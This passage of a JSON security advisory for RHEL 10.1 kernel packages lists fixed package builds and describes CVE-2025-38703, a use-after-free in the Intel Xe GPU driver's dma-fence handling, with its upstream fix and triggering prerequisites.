"RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "kernel: Linux kernel: Use-after-free in device mapper due to race condition in zone reporting"
},
{
"cve": "CVE-2025-38703",
"cwe": {
"id": "CWE-826",
"name": "Premature Release of Resource During Expected Lifetime"
},
"discovery_date": "2025-09-04T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2393157"
}
],
"notes": [
{
"category": "description",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/xe: Make dma-fences compliant with the safe access rules\n\nXe can free some of the data pointed to by the dma-fences it exports. Most\nnotably the timeline name can get freed if userspace closes the associated\nsubmit queue. At the same time the fence could have been exported to a\nthird party (for example a sync_fence fd) which will then cause an use-\nafter-free on subsequent access.\n\nTo make this safe we need to make the driver compliant with the newly\ndocumented dma-fence rules. Driver has to ensure a RCU grace period\nbetween signalling a fence and freeing any data pointed to by said fence.\n\nFor the timeline name we simply make the queue be freed via kfree_rcu and\nfor the shared lock associated with multiple queues we add a RCU grace\nperiod before freeing the per GT structure holding the lock.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: drm/xe: Make dma-fences compliant with the safe access rules",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability can in theory be triggered by a non-privileged user as the primary requirements are:\n1. The ability to trigger normal GPU operations (ex. creating and closing submission queues);\n2. Read/Write permissions granted via the `video` and `render` groups (fairly standard for most operating systems);\n3. Intel GPU hardware.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
